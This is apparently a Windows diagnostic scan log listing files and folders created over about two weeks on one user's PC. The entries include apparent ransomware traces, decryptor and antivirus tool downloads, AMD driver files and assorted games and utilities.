2020-09-01 20:48 - 2020-09-01 20:49 - 000001135 _____ C:\Users\Hetitor\Desktop\leer de dragon.txt
2020-09-01 18:54 - 2020-09-01 18:54 - 000000000 ____D C:\ProgramData\Sync App Settings
2020-09-01 15:07 - 2020-09-01 15:08 - 000000000 ____D C:\Users\Hetitor\AppData\LocalLow\Adobe
2020-09-01 13:49 - 2020-09-01 13:49 - 000000000 ____D C:\Users\Hetitor\Documents\Bluetooth
2020-09-01 13:49 - 2020-09-01 13:49 - 000000000 ____D C:\ProgramData\Bluetooth
2020-09-01 13:47 - 2020-09-01 13:47 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Scooter Software
2020-09-01 10:25 - 2020-09-01 10:25 - 000004432 _____ C:\Windows\system32\Tasks\Opera scheduled assistant Autoupdate 1598966741
2020-09-01 10:25 - 2020-09-01 10:25 - 000004182 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1598966736
2020-09-01 10:25 - 2020-09-01 10:25 - 000001412 _____ C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navegador Opera.lnk
2020-08-31 19:52 - 2020-08-31 19:52 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\FTweak
2020-08-31 19:52 - 2020-08-31 19:52 - 000000000 ____D C:\ProgramData\FTWeak
2020-08-30 23:57 - 2020-08-30 23:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-08-30 23:57 - 2020-08-30 23:57 - 000000000 ____D C:\Multimediales
2020-08-30 23:54 - 2020-08-30 23:54 - 040732864 _____ C:\Users\Hetitor\Downloads\vlc-3.0.11-win32.exe
2020-08-30 23:25 - 2020-08-30 23:25 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\MPC-HC
2020-08-30 22:51 - 2020-08-30 22:51 - 000560401 _____ C:\Users\Hetitor\Desktop\ENSISoft Decryptor 1.txt
2020-08-30 22:49 - 2020-08-30 22:49 - 000560131 _____ C:\Users\Hetitor\Desktop\ENSISoft Decryptor.txt
2020-08-30 19:25 - 2020-08-30 19:25 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\proDAD
2020-08-30 16:15 - 2020-08-30 16:15 - 000000000 ____D C:\ProgramData\BVRP Software
2020-08-30 16:08 - 2020-08-30 17:32 - 1107037533 _____ C:\Users\Hetitor\Downloads\Dragon.15--rsload.net--.rar.opdownload
2020-08-30 13:38 - 2020-08-30 22:19 - 000000000 ____D C:\Users\Hetitor\Documents\FormatFactory
2020-08-30 13:38 - 2020-08-30 13:38 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FormatFactory
2020-08-30 13:38 - 2020-08-30 13:38 - 000000000 ____D C:\Users\Hetitor\AppData\Local\FTMod
2020-08-30 13:38 - 2020-08-30 13:38 - 000000000 ____D C:\FFOutput
2020-08-30 13:11 - 2020-08-30 13:18 - 088607640 _____ (Free Time Co., Ltd) C:\Users\Hetitor\Downloads\FFSetup5.4.0.0.-RSLOAD.NET-.exe
2020-08-29 19:23 - 2020-09-02 09:10 - 000000000 ____D C:\Antivirus
2020-08-29 16:13 - 2020-08-29 18:01 - 000000000 ____D C:\Program Files (x86)\Download Studio
2020-08-29 16:13 - 2020-08-29 18:00 - 000003796 _____ C:\Windows\system32\Tasks\DownloadStudio Standalone Updater
2020-08-29 16:13 - 2020-08-29 18:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download Studio
2020-08-29 13:00 - 2020-09-01 23:37 - 000000000 ____D C:\KVRT_Data
2020-08-29 12:51 - 2020-08-29 12:58 - 184013200 _____ (AO Kaspersky Lab) C:\Users\Hetitor\Downloads\KVRT.exe
2020-08-29 12:43 - 2020-08-29 12:43 - 000003814 _____ C:\Windows\system32\Tasks\EOSv3 Scheduler onLogOn
2020-08-29 12:43 - 2020-08-29 12:43 - 000003372 _____ C:\Windows\system32\Tasks\EOSv3 Scheduler onTime
2020-08-29 12:30 - 2020-08-29 12:30 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\DVDVideoSoft
2020-08-29 08:26 - 2020-08-29 08:26 - 000000772 _____ C:\Users\Hetitor\Desktop\ESET Online Scanner.lnk
2020-08-29 08:25 - 2020-08-29 08:25 - 000000900 _____ C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2020-08-29 08:25 - 2020-08-29 08:25 - 000000000 ____D C:\Users\Hetitor\AppData\Local\ESET
2020-08-28 10:21 - 2020-08-28 10:21 - 001648088 _____ (Emsisoft Ltd.) C:\Users\Hetitor\Downloads\decrypt_STOPPuma.exe
2020-08-28 08:56 - 2020-08-28 08:56 - 001176128 _____ (Emsisoft Ltd.) C:\Users\Hetitor\Downloads\decrypt_STOPDjvu.exe
2020-08-27 23:24 - 2020-08-27 23:24 - 000000000 ____D C:\Users\Hetitor\Documents\MumboJumbo
2020-08-27 23:24 - 2020-08-27 23:24 - 000000000 ____D C:\Users\Hetitor\AppData\Local\MumboJumbo
2020-08-27 20:22 - 2020-08-27 20:22 - 000000000 ____D C:\Program Files\GridinSoft Anti-Malware
2020-08-27 14:35 - 2020-08-27 14:35 - 000000000 ____D C:\ProgramData\GridinSoft
2020-08-26 23:29 - 2020-08-26 23:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aTube Catcher
2020-08-26 23:29 - 2020-08-26 23:29 - 000000000 ____D C:\Program Files (x86)\aTube Catcher 2.0
2020-08-26 23:29 - 2017-11-09 12:58 - 000440320 _____ (Dart Communications) C:\Windows\SysWOW64\DartSock.dll
2020-08-26 23:29 - 2017-11-09 12:58 - 000401408 _____ (Dart Communications) C:\Windows\SysWOW64\DartSecure2.dll
2020-08-26 23:29 - 2017-11-09 12:58 - 000249856 _____ (Dart Communications) C:\Windows\SysWOW64\DartCertificate.dll
2020-08-26 23:29 - 2008-08-18 18:18 - 000077824 _____ (Fox Magic Software) C:\Windows\SysWOW64\fmcodec.DLL
2020-08-26 17:55 - 2020-08-26 17:55 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Avanquest Software
2020-08-26 17:54 - 2020-08-26 17:54 - 000000000 ____D C:\ProgramData\Configuration
2020-08-26 16:51 - 2020-08-26 16:51 - 000000010 _____ C:\Windows\popcinfo.dat
2020-08-26 16:21 - 2020-08-26 16:21 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\RainbowGames
2020-08-26 16:17 - 2020-08-26 16:18 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Trio
2020-08-26 16:17 - 2020-08-26 16:17 - 000000000 ____D C:\Users\Hetitor\Documents\Boolat Games
2020-08-26 15:46 - 2020-08-26 15:46 - 000000000 ____D C:\Users\Hetitor\Documents\Tiger Woods PGA TOUR 12 The Masters
2020-08-26 15:17 - 2020-08-26 15:17 - 000000776 _____ C:\Users\Hetitor\AppData\Roaming\it.omnidea.Rulers.plist
2020-08-26 15:16 - 2020-08-26 15:16 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\XnView
2020-08-26 15:07 - 2020-08-26 15:09 - 000000000 ____D C:\Users\Hetitor\Documents\Picosmos
2020-08-26 15:07 - 2020-08-26 15:07 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Picosmos
2020-08-26 15:05 - 2020-08-26 15:06 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\PhotoScape
2020-08-26 15:03 - 2020-08-26 15:03 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Acumen Business Systems Ltd
2020-08-26 14:49 - 2020-08-26 14:49 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Morpheus Software
2020-08-26 00:40 - 2020-09-02 09:06 - 001594080 _____ (AMD) C:\Windows\system32\coinst_20.20.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000737504 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Rapidfire64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000621792 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\Rapidfire.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000497376 _____ C:\Windows\system32\GameManager64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000469216 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atidemgy.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000380640 _____ C:\Windows\SysWOW64\GameManager32.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000245984 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atig6txx.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000213728 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atigktxx.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000187616 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantle64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000183024 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\aticfx64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000167648 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atisamu64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000167136 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantleaxl64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000159272 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\aticfx32.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000157408 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantle32.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000143072 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantleaxl32.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000141536 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atisamu32.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000136416 _____ (AMD) C:\Windows\system32\atimuixx.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000130856 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atimpc64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000126176 _____ C:\Windows\system32\atidxx64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000108872 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atimpc32.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000108256 _____ C:\Windows\SysWOW64\atidxx32.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000047328 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\RapidFireServer64.dll
2020-08-26 00:40 - 2020-09-02 09:06 - 000044256 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\RapidFireServer.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 072724192 _____ C:\Windows\system32\amd_comgr.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 060127968 _____ C:\Windows\SysWOW64\amd_comgr32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 004632288 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amfrt64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 004156640 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amfrt32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 001784032 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atiadlxx.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 001345248 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxy.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 001345248 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxx.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000941784 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amdlvr64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000769240 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amdlvr32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000554200 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdmcl64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000547424 _____ C:\Windows\system32\amdmiracast.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000493792 _____ C:\Windows\system32\dgtrayicon.exe
2020-08-26 00:40 - 2020-09-02 09:05 - 000490200 _____ C:\Windows\system32\amdgfxinfo64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000384216 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdmcl32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000380632 _____ C:\Windows\SysWOW64\amdgfxinfo32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000340192 _____ C:\Windows\system32\clinfo.exe
2020-08-26 00:40 - 2020-09-02 09:05 - 000199440 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amdihk64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000168528 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amdihk32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000136552 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdave64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000135392 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000130856 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdpcom64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000123096 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdxc64.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000120888 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdave32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000108872 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdpcom32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000107736 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdxc32.dll
2020-08-26 00:40 - 2020-09-02 09:05 - 000070880 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\ati2erec.dll
2020-08-26 00:39 - 2020-09-02 09:05 - 003471376 _____ C:\Windows\SysWOW64\atiumdva.cap
2020-08-26 00:39 - 2020-09-02 09:05 - 003437632 _____ C:\Windows\system32\atiumd6a.cap
2020-08-26 00:39 - 2020-09-02 09:05 - 000762080 _____ (AMD) C:\Windows\system32\atieclxx.exe
2020-08-26 00:39 - 2020-09-02 09:05 - 000548096 _____ C:\Windows\SysWOW64\atiapfxx.blb
2020-08-26 00:39 - 2020-09-02 09:05 - 000548096 _____ C:\Windows\system32\atiapfxx.blb
2020-08-26 00:39 - 2020-09-02 09:05 - 000456928 _____ C:\Windows\system32\atieah64.exe
2020-08-26 00:39 - 2020-09-02 09:05 - 000352480 _____ C:\Windows\SysWOW64\atieah32.exe
2020-08-26 00:39 - 2020-08-26 00:39 - 000062056 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Drivers\amdxe.sys
2020-08-25 19:05 - 2020-08-30 20:02 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Avanquest
2020-08-25 17:46 - 2020-08-25 17:46 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Enigma
2020-08-25 08:47 - 2020-08-25 08:47 - 000002892 _____ C:\Windows\system32\Tasks\CCleanerSkipUAC
2020-08-25 08:40 - 2020-08-25 08:41 - 000000000 ____D C:\AdwCleaner
2020-08-25 08:30 - 2020-08-25 08:31 - 008414384 _____ (Malwarebytes) C:\Users\Hetitor\Desktop\adwcleaner_8.0.7.exe
2020-08-24 21:05 - 2020-08-24 21:05 - 000248968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2020-08-24 21:05 - 2020-08-24 21:05 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-08-24 21:05 - 2020-08-24 21:05 - 000019912 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2020-08-24 21:05 - 2020-08-24 21:05 - 000002044 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-08-24 21:05 - 2020-08-24 21:05 - 000002032 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-08-24 21:05 - 2020-08-24 21:05 - 000000000 ____D C:\Users\Hetitor\AppData\Local\mbam
2020-08-24 21:05 - 2020-08-24 21:05 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-08-24 21:04 - 2020-08-24 21:04 - 000000000 ____D C:\Program Files\Malwarebytes
2020-08-24 21:02 - 2020-08-24 21:02 - 000000000 ____D C:\Malwarebytes
2020-08-24 20:43 - 2020-08-24 20:43 - 000000000 ____D C:\Users\Public\Documents\Stardock
2020-08-24 20:43 - 2020-08-24 20:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stardock
2020-08-24 20:16 - 2020-08-24 20:16 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\CursorArts
2020-08-24 20:15 - 2020-08-24 20:15 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\IcoFX
2020-08-24 17:50 - 2020-09-01 10:30 - 000000000 ____D C:\Users\Hetitor\Downloads\Fotos
2020-08-24 17:41 - 2020-08-24 17:41 - 000001018 _____ C:\Users\Hetitor\Desktop\ZoomIt.lnk
2020-08-24 12:44 - 2020-08-24 12:46 - 000593280 _____ C:\TDSSKiller.3.1.0.28_24.08.2020_12.44.02_log.txt
2020-08-24 12:43 - 2020-08-24 12:43 - 000000492 _____ C:\TDSSKiller.3.1.0.28_24.08.2020_12.43.46_log.txt
2020-08-24 12:43 - 2020-08-24 12:43 - 000000366 _____ C:\TDSSKiller.3.1.0.12_24.08.2020_12.43.16_log.txt
2020-08-23 21:33 - 2020-08-24 12:45 - 000000000 ____D C:\TDSSKiller_Quarantine
2020-08-23 21:32 - 2020-08-23 21:34 - 000296872 _____ C:\TDSSKiller.3.1.0.12_23.08.2020_21.32.40_log.txt
2020-08-23 21:27 - 2020-08-23 21:27 - 000000000 _____ C:\ProgramData\1.txt
2020-08-23 20:53 - 2020-08-24 21:07 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\3b6c0724daf1
2020-08-23 20:52 - 2020-08-23 21:11 - 000000004 _____ C:\ProgramData\rc.dat
2020-08-23 20:50 - 2020-08-23 21:11 - 000000004 _____ C:\ProgramData\lock.dat
2020-08-23 20:50 - 2020-08-23 20:50 - 000000008 _____ C:\ProgramData\ts.dat
2020-08-23 20:50 - 2020-08-23 20:50 - 000000004 _____ C:\ProgramData\irw.atsd
2020-08-23 20:46 - 2020-08-23 20:46 - 000000000 ____D C:\Users\Hetitor\AppData\Local\719a4fae-b672-4001-a158-c7f2418b6a29
2020-08-23 20:37 - 2020-08-23 20:37 - 000000000 ____D C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70
2020-08-23 20:36 - 2020-08-23 22:02 - 000000000 ____D C:\Users\Hetitor\AppData\Local\1f329da7-627d-4794-bc18-a8569bf9636c
2020-08-23 20:36 - 2020-08-23 20:46 - 000000000 ____D C:\Users\Hetitor\AppData\Local\b1ce4da2-4070-406c-9afc-23bd84bf979e
2020-08-23 20:36 - 2020-08-23 20:36 - 000003772 _____ C:\Windows\system32\Tasks\NvNgxUpdateCheckDaily_{2A68F03E-F03E-F03E-F03E-2A68F03EF03E}
2020-08-23 20:36 - 2020-08-23 20:36 - 000000560 _____ C:\Users\Hetitor\AppData\Local\bowsakkdestx.txt
2020-08-23 20:36 - 2020-08-23 20:36 - 000000000 ____D C:\SystemID
2020-08-23 20:35 - 2020-08-23 21:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winyl
2020-08-23 20:35 - 2020-08-23 21:20 - 000000000 ____D C:\Program Files (x86)\Winyl
2020-08-23 20:35 - 2020-08-23 20:49 - 000000000 ____D C:\Program Files (x86)\alviks
2020-08-23 19:25 - 2020-08-23 21:36 - 000000000 ____D C:\ProgramData\UIU
2020-08-23 10:02 - 2020-09-01 15:07 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Adobe
2020-08-23 10:02 - 2020-08-23 10:02 - 000000000 ____D C:\Users\Public\Documents\Adobe
2020-08-23 10:02 - 2020-08-23 10:02 - 000000000 ____D C:\ProgramData\Adobe
2020-08-23 09:02 - 2020-08-23 09:20 - 000000000 ____D C:\Users\Public\Documents\RonyaSoft
2020-08-22 12:05 - 2020-08-22 12:05 - 000001024 ____H C:\AMTAG.BIN
2020-08-22 12:05 - 2020-08-22 12:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AOMEI Partition Assistant 8.9
2020-08-22 12:05 - 2016-12-27 18:45 - 000035760 _____ C:\Windows\system32\ddmdrv.sys
2020-08-22 12:05 - 2016-12-27 18:45 - 000033200 _____ C:\Windows\SysWOW64\ddmdrv.sys
2020-08-22 12:05 - 2016-09-29 09:44 - 001298584 _____ C:\Windows\ddmmain.exe
2020-08-22 12:04 - 2020-08-22 18:51 - 000000000 ____D C:\Program Files (x86)\AOMEI Partition Assistant
2020-08-22 12:04 - 2020-08-22 18:23 - 000002007 _____ C:\Windows\GA_OF.dat
2020-08-22 12:04 - 2020-08-12 15:02 - 002201768 _____ C:\Windows\ampa.exe
2020-08-22 12:04 - 2017-02-28 14:20 - 000038320 _____ C:\Windows\SysWOW64\ampa.sys
2020-08-22 12:04 - 2017-02-28 14:20 - 000038320 _____ C:\Windows\system32\ampa.sys
2020-08-22 10:47 - 2020-08-22 10:47 - 000002492 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk
2020-08-22 10:47 - 2020-08-22 10:47 - 000002473 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk
2020-08-22 10:47 - 2020-08-22 10:47 - 000002455 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk
2020-08-22 10:47 - 2020-08-22 10:47 - 000002448 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2020-08-22 10:47 - 2020-08-22 10:47 - 000002446 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk
2020-08-22 10:47 - 2020-08-22 10:47 - 000002404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk
2020-08-22 10:47 - 2020-08-22 10:47 - 000002400 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk
2020-08-22 10:47 - 2020-08-22 10:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Herramientas de Microsoft Office
2020-08-22 08:12 - 2020-09-01 18:55 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-08-22 08:12 - 2020-08-28 08:04 - 000003580 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-08-22 08:12 - 2020-08-28 08:04 - 000003456 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-08-21 23:54 - 2020-08-21 23:54 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-08-21 23:54 - 2020-08-10 10:38 - 000436536 _____ (Microsoft Corporation) C:\Windows\system32\QualityUpdateAssistant.dll
2020-08-21 23:54 - 2020-08-10 10:37 - 000905528 _____ (Microsoft Corporation) C:\Windows\system32\sedplugins.dll
2020-08-21 19:02 - 2020-08-21 19:02 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Wondershare
2020-08-21 19:02 - 2020-08-21 19:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2020-08-21 19:02 - 2020-08-21 19:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LAV Filters
2020-08-21 19:02 - 2020-08-21 19:02 - 000000000 ____D C:\Program Files (x86)\LAV Filters
2020-08-21 19:01 - 2020-08-27 10:57 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2020-08-21 19:01 - 2020-08-21 19:05 - 000000000 ____D C:\ProgramData\Wondershare
2020-08-21 19:01 - 2020-08-21 19:01 - 000000000 ____D C:\Program Files\Wondershare
2020-08-21 18:54 - 2020-08-21 18:54 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Skype
2020-08-21 18:48 - 2020-08-21 18:48 - 000000000 ____D C:\Program Files\Common Files\ATI Technologies
2020-08-21 18:39 - 2020-08-21 18:39 - 092471296 _____ C:\Windows\system32\config\SOFTWARE.iobit
2020-08-21 18:39 - 2020-08-21 18:39 - 005550080 _____ C:\Windows\system32\config\DRIVERS.iobit
2020-08-21 18:39 - 2020-08-21 18:39 - 000733184 _____ C:\Windows\system32\config\DEFAULT.iobit
2020-08-21 18:39 - 2020-08-21 18:39 - 000081920 _____ C:\Windows\system32\config\SAM.iobit
2020-08-21 18:39 - 2020-08-21 18:39 - 000032768 _____ C:\Windows\system32\config\SECURITY.iobit
2020-08-21 18:35 - 2020-08-21 18:35 - 000003122 _____ C:\Windows\system32\Tasks\ASC_PerformanceMonitor
2020-08-21 17:46 - 2020-08-21 17:46 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\BlamGames
2020-08-21 17:25 - 2020-08-21 17:25 - 000000000 ____D C:\ProgramData\FireGlow
2020-08-21 17:23 - 2020-08-21 17:23 - 000000000 ____D C:\Users\Hetitor\Documents\My Games
2020-08-21 17:08 - 2020-08-21 17:14 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Crayon Physics Deluxe
2020-08-21 17:03 - 2020-08-21 17:03 - 000000000 ____D C:\Users\Public\Documents\BrainsBreaker puzzles
2020-08-21 17:03 - 2020-08-21 17:03 - 000000000 ____D C:\Users\Public\Documents\BrainsBreaker
2020-08-21 17:03 - 2020-08-21 17:03 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\JTTSoft
2020-08-21 16:57 - 2020-08-21 16:57 - 000000067 _____ C:\Windows\Getting Started.htm
2020-08-21 16:55 - 2020-08-21 17:00 - 000000087 _____ C:\Windows\99999
2020-08-21 16:50 - 2020-08-21 17:00 - 000000543 _____ C:\Windows\0
2020-08-21 16:50 - 2020-08-21 17:00 - 000000160 _____ C:\Windows\10
2020-08-21 16:47 - 2020-08-21 16:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brain Trainer 3
2020-08-21 16:46 - 2020-08-21 16:46 - 000000000 ____D C:\Program Files (x86)\Mindscape
2020-08-21 16:44 - 2020-08-21 18:39 - 000000000 ____D C:\ProgramData\PCGameBoost
2020-08-21 16:44 - 2020-08-21 16:44 - 000003206 _____ C:\Windows\system32\Tasks\SmartGameBooster Startup
2020-08-21 16:43 - 2020-08-21 16:43 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\PCGameBoost
2020-08-21 16:43 - 2020-08-21 16:43 - 000000000 ____D C:\Users\Hetitor\AppData\LocalLow\PCGameBoost
2020-08-21 08:38 - 2020-09-01 18:29 - 000000000 ____D C:\Users\Hetitor\AppData\Local\ElevatedDiagnostics
2020-08-20 23:42 - 2020-08-20 23:42 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Big Kahuna Reef 2 - Chain Reaction
2020-08-20 23:42 - 2020-08-20 23:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2020-08-20 23:42 - 2020-08-20 23:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Big Kahuna Reef 2 - Chain Reaction
2020-08-20 23:42 - 2020-08-20 23:42 - 000000000 ____D C:\Program Files (x86)\Big Kahuna Reef 2 - Chain Reaction
2020-08-20 23:41 - 2020-08-21 08:38 - 000000000 ____D C:\ProgramData\TEMP
2020-08-20 23:40 - 2020-08-28 16:45 - 000000000 ____D C:\BigFishCache
2020-08-20 23:40 - 2020-08-21 08:39 - 000000000 ____D C:\ProgramData\Big Fish
2020-08-20 23:40 - 2020-08-20 23:41 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Big Fish
2020-08-20 23:29 - 2020-08-20 23:29 - 000000000 ____D C:\Users\Hetitor\AppData\LocalLow\Rovio
2020-08-20 23:25 - 2020-08-30 20:15 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Macromedia
2020-08-20 21:05 - 2020-08-20 21:05 - 000472064 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000384000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000215552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplayx.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000060928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnathlp.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpwsockx.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2020-08-20 21:05 - 2020-08-20 21:05 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpmodemx.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000022528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
